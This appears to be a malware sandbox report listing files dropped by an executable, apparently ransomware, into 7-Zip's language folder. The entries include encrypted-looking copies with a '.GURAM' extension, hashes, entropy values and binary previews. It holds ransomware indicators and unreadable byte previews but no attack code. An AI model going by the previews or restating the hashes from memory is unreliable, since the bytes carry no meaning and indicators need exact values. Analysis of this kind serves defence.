                                                                                                                                                                                                                                                Preview:......b.:)_.`.X...GXsHB/!.....'!M.-..&H..RP...........ck....Ub..j.cS...?.Th>.....R...O.ab.%...[h..'.......yl.Q..b..7...........7Aw..z......./..a.o.&^w..uF...Mm..f.-F+j'....=..3..m]'.i.N..VI......<......L...(.|~ZzN....D.@V...@l'7...,Jq.......]!-W..U..70..9!....{..^r.}.B....K...j.QZB....,....:.F..9....S.X..W.6N.%...&. P..L..{.XD}m.N;D......g..H.h.t...L.4P..i.0.p.L2]....p4...?dW7....}".[O..<*.'...{&=^.8-.<.Uv...}..._.}....eO0\..+....@A.:...u......+G.d..0.g......~..k*,.|&....2...M._...j].V...K.uyJ.`k&.e..1%.d...$...n-"..6.C.. S...;`...n.] 8G../=r.{..,e..r.......f...9]A.,.1.T$.V...'. BT........Re....-fa....#..v.{-7.w.. )6..4..F...LU..;.....q(.z2...EW% ..%09n...zL..S!....%.oi...Ez.......iD.0..x..(.p.L...o,.f .v..U..|.3'...K.Y.B.,.)....J.S:VvPGy.....u....,U4.oji...o.W.+Jp.....1nA....hf.w..../!...h.y.i....g.:......O.t.<.\..E...........Q..I...O...Ac...;5q.T._...=r.zk.bHHS$..:.......L..S..B8...O:..V...=.[.bT=~....x...R;$..$.%.....L.....).Cs....j...&I

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\it.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:SysEx File - AKG
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):10358
                                                                                                                                                                                                                                                Entropy (8bit):7.97817832472156
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:a3j9HBZBvoq+uVL/23AVGlPpmFXRAziCCN222h6opFjUqkbpZz0BUz:azhBT6ut5BbFwbURJvz
                                                                                                                                                                                                                                                MD5:0AED43C67AE0228AED0A7DF4BE927FAE
                                                                                                                                                                                                                                                SHA1:B23B92C7743BE6074ADDC4B7C83A4730246F6C9A
                                                                                                                                                                                                                                                SHA-256:EE8362D35D93064E85347CAB28C3009782B9881981F02DD1D433ED193DE10ADA
                                                                                                                                                                                                                                                SHA-512:388F0794DFEECCA266084B7AB6C9A657E55CFA53EFAD7248CD0372A92FF2E1F60D16FBC5D152A48F4938E0A06D84678B1049573B9BDED6BAF16BDA7F89FA52F8
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:......b.:)_.`.X...GXsHB/!.....'!M.-..&H..RP...........ck....Ub..j.cS...?.Th>.....R...O.ab.%...[h..'.......yl.Q..b..7...........7Aw..z......./..a.o.&^w..uF...Mm..f.-F+j'....=..3..m]'.i.N..VI......<......L...(.|~ZzN....D.@V...@l'7...,Jq.......]!-W..U..70..9!....{..^r.}.B....K...j.QZB....,....:.F..9....S.X..W.6N.%...&. P..L..{.XD}m.N;D......g..H.h.t...L.4P..i.0.p.L2]....p4...?dW7....}".[O..<*.'...{&=^.8-.<.Uv...}..._.}....eO0\..+....@A.:...u......+G.d..0.g......~..k*,.|&....2...M._...j].V...K.uyJ.`k&.e..1%.d...$...n-"..6.C.. S...;`...n.] 8G../=r.{..,e..r.......f...9]A.,.1.T$.V...'. BT........Re....-fa....#..v.{-7.w.. )6..4..F...LU..;.....q(.z2...EW% ..%09n...zL..S!....%.oi...Ez.......iD.0..x..(.p.L...o,.f .v..U..|.3'...K.Y.B.,.)....J.S:VvPGy.....u....,U4.oji...o.W.+Jp.....1nA....hf.w..../!...h.y.i....g.:......O.t.<.\..E...........Q..I...O...Ac...;5q.T._...=r.zk.bHHS$..:.......L..S..B8...O:..V...=.[.bT=~....x...R;$..$.%.....L.....).Cs....j...&I

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\ja.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):12825
                                                                                                                                                                                                                                                Entropy (8bit):7.9859543405154065
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:gZXnXW4f9Mei7uuUmyDjxJdFOq5tqqsC16433UZV4LMx8IpVLhhrBjU6:gZXnGuu8DjxJdQ+8q5c433UZPLhJy6
                                                                                                                                                                                                                                                MD5:5AC54578C3AB154A4DDDA68BEED49DC7
                                                                                                                                                                                                                                                SHA1:F6FA3994CF6B47212A3FBC271772461369B75F9E
                                                                                                                                                                                                                                                SHA-256:8AEBEF7B7D891B8046BEDD05E632F99770516B1829F08E79AE4BD51FF58D0275
                                                                                                                                                                                                                                                SHA-512:AC2851F13251AA41BEF4550743FCBBC39EF9AC526D78043BABAD6AB42A19B609866893C5640791E214E1098AA01939261588C4AA0494ECFD5548AB2A647F5B91
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.P..JY.....[W ...:.E.@...j}30........G_.. .....~W...rQ..>.zq.=..B...L......U............+m..-.[r.L... .......^^"...r...c....6.o6IGJ......By...........ZY..v)..e...b|..,...`;mu......p.....`.......o.y..U....%.O[....9E@.F.O..N...O..4t{...M.[.Q).E....x...&L..v...p_...Ou.h.6&..n...P).Q.M...U.......g.WK....e.9%fPI.ZxWk.y.o.9..~....?.h..,.mI...b....W.~1..s...9.d...<..5....yw...v....cA.2./....4..+d1......E.1..q. ..N.H...rj...d...T.(!?MV.L....R/.U.o.......Q.....)<.....1..e5...-_tDyz.[..)..T.z1=Pk....`~W.;....w$S.jU...+.;E..a.......$0$6.qX..h...=8c....\....<.+...{4^.j.RL...1n..*.{.....3o.,."..=iCOq.Z.|u..Zg.t..e...u.#r....*H...zG.=....bI&..._..~`.<h...<|..Mf..q...S84..L...c.(L......Z.j....+*..5.fm.-(-j..YU.....\y....a]...J^.h.....=.C..r.O..zl.....E[..W ..Ok..).d.nR.....s.S.FkXx..yA.._U.}...9]...7.a..>."t+.'.....e..0.AoV.E......Pe.,".]......E..U...{....yD..l....}.r..s.....kE{.jG}.-...-.M...j...a..wq.D.*.Rq...vE;.%..Bb.Sxk..... v...E.pq./v)N.....6

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\ja.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):12825
                                                                                                                                                                                                                                                Entropy (8bit):7.9859543405154065
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:gZXnXW4f9Mei7uuUmyDjxJdFOq5tqqsC16433UZV4LMx8IpVLhhrBjU6:gZXnGuu8DjxJdQ+8q5c433UZPLhJy6
                                                                                                                                                                                                                                                MD5:5AC54578C3AB154A4DDDA68BEED49DC7
                                                                                                                                                                                                                                                SHA1:F6FA3994CF6B47212A3FBC271772461369B75F9E
                                                                                                                                                                                                                                                SHA-256:8AEBEF7B7D891B8046BEDD05E632F99770516B1829F08E79AE4BD51FF58D0275
                                                                                                                                                                                                                                                SHA-512:AC2851F13251AA41BEF4550743FCBBC39EF9AC526D78043BABAD6AB42A19B609866893C5640791E214E1098AA01939261588C4AA0494ECFD5548AB2A647F5B91
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.P..JY.....[W ...:.E.@...j}30........G_.. .....~W...rQ..>.zq.=..B...L......U............+m..-.[r.L... .......^^"...r...c....6.o6IGJ......By...........ZY..v)..e...b|..,...`;mu......p.....`.......o.y..U....%.O[....9E@.F.O..N...O..4t{...M.[.Q).E....x...&L..v...p_...Ou.h.6&..n...P).Q.M...U.......g.WK....e.9%fPI.ZxWk.y.o.9..~....?.h..,.mI...b....W.~1..s...9.d...<..5....yw...v....cA.2./....4..+d1......E.1..q. ..N.H...rj...d...T.(!?MV.L....R/.U.o.......Q.....)<.....1..e5...-_tDyz.[..)..T.z1=Pk....`~W.;....w$S.jU...+.;E..a.......$0$6.qX..h...=8c....\....<.+...{4^.j.RL...1n..*.{.....3o.,."..=iCOq.Z.|u..Zg.t..e...u.#r....*H...zG.=....bI&..._..~`.<h...<|..Mf..q...S84..L...c.(L......Z.j....+*..5.fm.-(-j..YU.....\y....a]...J^.h.....=.C..r.O..zl.....E[..W ..Ok..).d.nR.....s.S.FkXx..yA.._U.}...9]...7.a..>."t+.'.....e..0.AoV.E......Pe.,".]......E..U...{....yD..l....}.r..s.....kE{.jG}.-...-.M...j...a..wq.D.*.Rq...vE;.%..Bb.Sxk..... v...E.pq./v)N.....6

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\ka.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):18811
                                                                                                                                                                                                                                                Entropy (8bit):7.990797447003085
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:384:F6oBjxbz9N6rqPS0sd9E4zudoH2EYjJFUFk/fTOKGrVSick6F:JlNs2BsjbcxPUk/rOKGD6F
                                                                                                                                                                                                                                                MD5:E857DB9117244889CC8DB4EFDC3878FA
                                                                                                                                                                                                                                                SHA1:D7C591D0D76EFFF6A99706F7858D92358E2426A2
                                                                                                                                                                                                                                                SHA-256:5C7B8691C31E098C7B29656AC98484BD075240050C62A6ACE6A9DE49C9D5B83B
                                                                                                                                                                                                                                                SHA-512:7F3CA204A3D7B777777FC556C7276B43AF860A9F82AC5198D401F76C177975BC2C9F2935FBD06F9E146316D6F3B151D273743C11F27A60A0A929310476607C54
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:&.g.k.CPN3.2..8.fCdb6=|.E\Z.....@.....Mn.*B.:.Z.$..".O7....(I].:"!..zb?..k....[7!Y.....H}.;T.....;a.6.[0...%&[........A..".Ds?.a4......R..3.4.....Xf.6.O.....}O.sg-..se.|.|..Sd......y...qu..w.8<..H.J..{.."F.W..e,.!.(....W..D.^.V.....~..RG.c......2...U.'.'...l.]...?;13].S.NLf.i.........R...o..<2...u...[..T.&G....&.W.%!.>.j...#...;.E.i.1.?.;'\.X.JX...&..dSG.J.d1....}..hI....V.p.+.J.:.}.Yj.V...Q...vPh..T? LW4....w.)...4.GK.\mX".4.F..5.Y.&4.......L...#V...3.'...ZfN..5..9..%........^,6).#.l.,..+.......oS$..u(.C.>[..>.$.....3.d..R./'....)XyN...v."iW.AX0o...f6.Y.Na.93...4..o......w.).M2.O=W..~.......X.<.J/...8<e.wd.[.f.m.....d$ ..y..Q.;.../....*0P.{!~y.|m..Z.f...N..l.N..PH..WW%v......^..0.K.U6v_.WP;>'.^K!v;l.=O..3s..J..MU..$S...z1*... .s....>R..(...........M.*gBnmR..w65....0_j...!&.s'.].}.W...,..........R.CM....5.&...a......|...^..R..y....U..`.....j_Fx..4..5N..M.BJ..-;..w..M.O........~.v..r..E...OR...........6>.u.^.=,i..M....N.F..l..wY....4.!.....E.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\ka.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):18811
                                                                                                                                                                                                                                                Entropy (8bit):7.990797447003085
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:384:F6oBjxbz9N6rqPS0sd9E4zudoH2EYjJFUFk/fTOKGrVSick6F:JlNs2BsjbcxPUk/rOKGD6F
                                                                                                                                                                                                                                                MD5:E857DB9117244889CC8DB4EFDC3878FA
                                                                                                                                                                                                                                                SHA1:D7C591D0D76EFFF6A99706F7858D92358E2426A2
                                                                                                                                                                                                                                                SHA-256:5C7B8691C31E098C7B29656AC98484BD075240050C62A6ACE6A9DE49C9D5B83B
                                                                                                                                                                                                                                                SHA-512:7F3CA204A3D7B777777FC556C7276B43AF860A9F82AC5198D401F76C177975BC2C9F2935FBD06F9E146316D6F3B151D273743C11F27A60A0A929310476607C54
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:&.g.k.CPN3.2..8.fCdb6=|.E\Z.....@.....Mn.*B.:.Z.$..".O7....(I].:"!..zb?..k....[7!Y.....H}.;T.....;a.6.[0...%&[........A..".Ds?.a4......R..3.4.....Xf.6.O.....}O.sg-..se.|.|..Sd......y...qu..w.8<..H.J..{.."F.W..e,.!.(....W..D.^.V.....~..RG.c......2...U.'.'...l.]...?;13].S.NLf.i.........R...o..<2...u...[..T.&G....&.W.%!.>.j...#...;.E.i.1.?.;'\.X.JX...&..dSG.J.d1....}..hI....V.p.+.J.:.}.Yj.V...Q...vPh..T? LW4....w.)...4.GK.\mX".4.F..5.Y.&4.......L...#V...3.'...ZfN..5..9..%........^,6).#.l.,..+.......oS$..u(.C.>[..>.$.....3.d..R./'....)XyN...v."iW.AX0o...f6.Y.Na.93...4..o......w.).M2.O=W..~.......X.<.J/...8<e.wd.[.f.m.....d$ ..y..Q.;.../....*0P.{!~y.|m..Z.f...N..l.N..PH..WW%v......^..0.K.U6v_.WP;>'.^K!v;l.=O..3s..J..MU..$S...z1*... .s....>R..(...........M.*gBnmR..w65....0_j...!&.s'.].}.W...,..........R.CM....5.&...a......|...^..R..y....U..`.....j_Fx..4..5N..M.BJ..-;..w..M.O........~.v..r..E...OR...........6>.u.^.=,i..M....N.F..l..wY....4.!.....E.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\kaa.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):8710
                                                                                                                                                                                                                                                Entropy (8bit):7.978548173351528
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:6qK7TDLoEbHwQWN4JQeJjbR0VXTnnktWe9KGMjczZjAxjlzuTXbyf0z8k5wZM06M:oTDPHiiQ0ApodcHzeL5J4qLpVEUE
                                                                                                                                                                                                                                                MD5:D93308D2F49D5326B1D94F2C24322035
                                                                                                                                                                                                                                                SHA1:9F7F03FE03E190ACF2DE46F4672AB55D384934EA
                                                                                                                                                                                                                                                SHA-256:AD020D248DB5523764B08F7014254E4A4FC2420E6BBEE1B9ACBFDFCE79E57EFF
                                                                                                                                                                                                                                                SHA-512:92FBDC5F6342D85314EBB06EFC393A7FAF9F21F60407ABE7C5CFAC0405E6A0B9E45E31F651CEA81B784FFA2FCE003A76DF4A8DBA602692D43D26510100D4F411
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.("....~|....t0..3..M..,........Xr..c.~."..s .=./F.$.y.k.............q..T#e.e9....[......q(.....h....'.....`......by....0|R.f....A0.)..b..)S.....O..7*h1.H.&....w=W...d,MQWg..i.....=.{.=-.9.....U6..1.,..U...S[..1....3..~... Z7.z ."`..>1i7..;8G.\.....oP.^.<...<...~a6..AQ.1.:@q.s......f.....B....[..h.....[.f.S ..#.7w7......m..a.m~$....Q..z..T...R....c.ynk...?g...Y(....;.k.W.8G@R~..w..W3.V{.[....W..~.]Q...........O.".B./.4...l..l.........P...lY.K..$q......tN..p.....9.f7..h.;\.b...FD 3 !..f..t....I....C...7..k?<...u.....7P.20...m..|x_..&*S..ZX.X...3....R(.T.[.r+.......O.a.e...o..RX8:..4...V..{.......v..H?......\.(/.....*.9.J..Ie.K7&...d.?\R..H.(..g..8....u.ge!.....K.Z..y,.........^.K...R...d......i(^..OJpa.8JC.0.Q....6....(.x.....p.....^...8.^.R....M..W-rDz2T..L.&...$.Tvw..x......2:.j...,W...H.k.g|:.Bd<A.L...O.......).{.$..e..!=.x..L....j.2.z..H.&.k..i(..H*.9..7..uE,zj......C....*(Nf.p. .p...F.u..\h...7.#...w...+...7p c.r.e.....NF.9%...C.UjXu<...R

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\kaa.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):8710
                                                                                                                                                                                                                                                Entropy (8bit):7.978548173351528
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:6qK7TDLoEbHwQWN4JQeJjbR0VXTnnktWe9KGMjczZjAxjlzuTXbyf0z8k5wZM06M:oTDPHiiQ0ApodcHzeL5J4qLpVEUE
                                                                                                                                                                                                                                                MD5:D93308D2F49D5326B1D94F2C24322035
                                                                                                                                                                                                                                                SHA1:9F7F03FE03E190ACF2DE46F4672AB55D384934EA
                                                                                                                                                                                                                                                SHA-256:AD020D248DB5523764B08F7014254E4A4FC2420E6BBEE1B9ACBFDFCE79E57EFF
                                                                                                                                                                                                                                                SHA-512:92FBDC5F6342D85314EBB06EFC393A7FAF9F21F60407ABE7C5CFAC0405E6A0B9E45E31F651CEA81B784FFA2FCE003A76DF4A8DBA602692D43D26510100D4F411
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.("....~|....t0..3..M..,........Xr..c.~."..s .=./F.$.y.k.............q..T#e.e9....[......q(.....h....'.....`......by....0|R.f....A0.)..b..)S.....O..7*h1.H.&....w=W...d,MQWg..i.....=.{.=-.9.....U6..1.,..U...S[..1....3..~... Z7.z ."`..>1i7..;8G.\.....oP.^.<...<...~a6..AQ.1.:@q.s......f.....B....[..h.....[.f.S ..#.7w7......m..a.m~$....Q..z..T...R....c.ynk...?g...Y(....;.k.W.8G@R~..w..W3.V{.[....W..~.]Q...........O.".B./.4...l..l.........P...lY.K..$q......tN..p.....9.f7..h.;\.b...FD 3 !..f..t....I....C...7..k?<...u.....7P.20...m..|x_..&*S..ZX.X...3....R(.T.[.r+.......O.a.e...o..RX8:..4...V..{.......v..H?......\.(/.....*.9.J..Ie.K7&...d.?\R..H.(..g..8....u.ge!.....K.Z..y,.........^.K...R...d......i(^..OJpa.8JC.0.Q....6....(.x.....p.....^...8.^.R....M..W-rDz2T..L.&...$.Tvw..x......2:.j...,W...H.k.g|:.Bd<A.L...O.......).{.$..e..!=.x..L....j.2.z..H.&.k..i(..H*.9..7..uE,zj......C....*(Nf.p. .p...F.u..\h...7.#...w...+...7p c.r.e.....NF.9%...C.UjXu<...R

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\kab.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9197
                                                                                                                                                                                                                                                Entropy (8bit):7.978801182251812
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:KRQNHVP3c8nJzlv5c6XvX53E/nU/MW3mZapfZs0U/:KRQN1fcSZlxhv5f/rWMc7/
                                                                                                                                                                                                                                                MD5:4EEF8D451905AD06D745790FC5A6E1D8
                                                                                                                                                                                                                                                SHA1:E9F3DEED04A3AD9C8E2CE7D71E9EA6821477395D
                                                                                                                                                                                                                                                SHA-256:80348E10F78B4BBC93CCC066ACD1280B469BD57D9C3DA9683285BC2A0B5AEAAA
                                                                                                                                                                                                                                                SHA-512:C97BA245308049177BC98A69C881A098A97CF114CF09FE79513560424A716D1CAFB0B960ED1A395626B8A84B5859E70A646B68BF23720875E81DA8B7C4C5294C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.....Z.~V...w.3............Sc..%..<......M.p\...J.(...|...vs......M..1s.^.(..:..]..\.@....`.D.....\..l'=xG......m....'.?6.a.5.....?3#..$5.../....b..?.t.z{`5....,......%.h..3.$=.`u#.....8.j.....J.;...|.a....^..>8.g.).....8.._.a..S.h:.H..6..3.(#....<.~~..7.M!7.v..0...O...2u.U.r......4J.q.vV...Na|..P.0.....p)....2&...........R...z.$...`..1/.7.....e....sb..rD.*...8k./.!.Qs.g.e...<._..v..z;......]".I.4.C.....sf...H..k..t...jy6^;.....s...-.gU,..>kX......P..p.lW0o...#..Do..@.j\z......\.W.?f.o..A.r../...x.....o....7...J.c..M.Ou.O..fU.H....z.1aS..x.i....y(..k^;+.Oo a..h..X#@"D..bU.g...M.HW.NP.:P...v.....4+.. 9.Fp..?...._.i..v4>..._oV.R.`..MX.....\.rV5..*......I9N....f*./.2..8.#*F.J.7\\...W<.g8"p....&..V.\b.M.[..C.......+9.+&.+(..?...s.?S7.....V]....?@N....N..}.....bY...E.].P..f..7....QpZ/8...R.\.0h\L.<.......y.J[n.p+H...a.d...g......{...~..0'......b^.l..@.~D.n..Ia...B...m...c.9a.V...p..".^n..Jc..Qy...._........A.(.h..Y..j.J.V.\M......0.l)....U./..

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\kab.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9197
                                                                                                                                                                                                                                                Entropy (8bit):7.978801182251812
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:KRQNHVP3c8nJzlv5c6XvX53E/nU/MW3mZapfZs0U/:KRQN1fcSZlxhv5f/rWMc7/
                                                                                                                                                                                                                                                MD5:4EEF8D451905AD06D745790FC5A6E1D8
                                                                                                                                                                                                                                                SHA1:E9F3DEED04A3AD9C8E2CE7D71E9EA6821477395D
                                                                                                                                                                                                                                                SHA-256:80348E10F78B4BBC93CCC066ACD1280B469BD57D9C3DA9683285BC2A0B5AEAAA
                                                                                                                                                                                                                                                SHA-512:C97BA245308049177BC98A69C881A098A97CF114CF09FE79513560424A716D1CAFB0B960ED1A395626B8A84B5859E70A646B68BF23720875E81DA8B7C4C5294C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.....Z.~V...w.3............Sc..%..<......M.p\...J.(...|...vs......M..1s.^.(..:..]..\.@....`.D.....\..l'=xG......m....'.?6.a.5.....?3#..$5.../....b..?.t.z{`5....,......%.h..3.$=.`u#.....8.j.....J.;...|.a....^..>8.g.).....8.._.a..S.h:.H..6..3.(#....<.~~..7.M!7.v..0...O...2u.U.r......4J.q.vV...Na|..P.0.....p)....2&...........R...z.$...`..1/.7.....e....sb..rD.*...8k./.!.Qs.g.e...<._..v..z;......]".I.4.C.....sf...H..k..t...jy6^;.....s...-.gU,..>kX......P..p.lW0o...#..Do..@.j\z......\.W.?f.o..A.r../...x.....o....7...J.c..M.Ou.O..fU.H....z.1aS..x.i....y(..k^;+.Oo a..h..X#@"D..bU.g...M.HW.NP.:P...v.....4+.. 9.Fp..?...._.i..v4>..._oV.R.`..MX.....\.rV5..*......I9N....f*./.2..8.#*F.J.7\\...W<.g8"p....&..V.\b.M.[..C.......+9.+&.+(..?...s.?S7.....V]....?@N....N..}.....bY...E.].P..f..7....QpZ/8...R.\.0h\L.<.......y.J[n.p+H...a.d...g......{...~..0'......b^.l..@.~D.n..Ia...B...m...c.9a.V...p..".^n..Jc..Qy...._........A.(.h..Y..j.J.V.\M......0.l)....U./..

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\kk.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):11340
                                                                                                                                                                                                                                                Entropy (8bit):7.985965119196479
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:h3GGIqj8RiXR/G/Xnu/Sll7txrr2BYC7l9pIv7KJDBqnCY0RWXlq0JIPsa4UJ:h3GHqj4UdoXnualtr2iC7l9pIv7K7qnu
                                                                                                                                                                                                                                                MD5:252D377039AEF4732469B7578E80695B
                                                                                                                                                                                                                                                SHA1:914E73B3BF0665F53A438695E2FD22984F0FC8E9
                                                                                                                                                                                                                                                SHA-256:7DF1AB7777B1D2327EA98ECFBA2BF8B7EF1354B75420C3E58F36BFD88A724E3D
                                                                                                                                                                                                                                                SHA-512:B168631AF14890DBB45AC699F77CD63A99B7E9C2F2D842BDC1EAE7E012D22CF3BA7DE0617B14607DE46BA5E9EB5AB8623B3149FF373C56638EF2DE88183E4108
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...U.f.M..0o.#.my,..FX..GA..V.&.gg._.R.!r.C>-..1.......{.0.e..m....&...d..hr....n..SUL5.03..)....;.mV..v.X.R....<^cL..g>[.......0HUQ.vZC./r...(E2.........F........e>.o..po.Q;..+..f.a.gK..qk..e|6t{.4T.;X>%D...#.S...)..7......V*7..PQ2........"..5...ob..n~....%c\....@..F+.D.u...[..?4..".L?.]'.@.L(z..nq#%./2..CJ......._..zg....".WH......"..w{.h"......U?.....k.....|..@.....(jM..L..6p.....V/w..>.o.$.m.......1.`0N..p,d...e7..r..h..9..h..NR.v=..4L;.\o..y.F.0p.V...A.E....Gp(...:|..Z,.<..l./T...3K..G.m>.az>`.ge..w(...V .{.#.*._.1.J%.....L:.k.nb.F...u...7..'=.}..0..?...y..%k..w.u.e.0...h+t...{X........g.Cu:.....$.....5H..x.4.......6.l..%..F..uk..W ..F..u..|.*B....3..IW....6T....zy`..-...r.......4..#..@.'."b...l. .4...MN>...._....D.<\?....qQ. .E;...2^.[.|.....J....vz.jA..H2....'\..zq_......d....c..!$.&.3..P...>......~.Y..G;......E.M....G..T.k:..o..).+.9Up:..P9o.VY ..;W~...H./0=.i`Z.....]. ..8.S.m...K.<...?.........p..=..........[r9S.(..].m.I

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\kk.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):11340
                                                                                                                                                                                                                                                Entropy (8bit):7.985965119196479
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:h3GGIqj8RiXR/G/Xnu/Sll7txrr2BYC7l9pIv7KJDBqnCY0RWXlq0JIPsa4UJ:h3GHqj4UdoXnualtr2iC7l9pIv7K7qnu
                                                                                                                                                                                                                                                MD5:252D377039AEF4732469B7578E80695B
                                                                                                                                                                                                                                                SHA1:914E73B3BF0665F53A438695E2FD22984F0FC8E9
                                                                                                                                                                                                                                                SHA-256:7DF1AB7777B1D2327EA98ECFBA2BF8B7EF1354B75420C3E58F36BFD88A724E3D
                                                                                                                                                                                                                                                SHA-512:B168631AF14890DBB45AC699F77CD63A99B7E9C2F2D842BDC1EAE7E012D22CF3BA7DE0617B14607DE46BA5E9EB5AB8623B3149FF373C56638EF2DE88183E4108
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
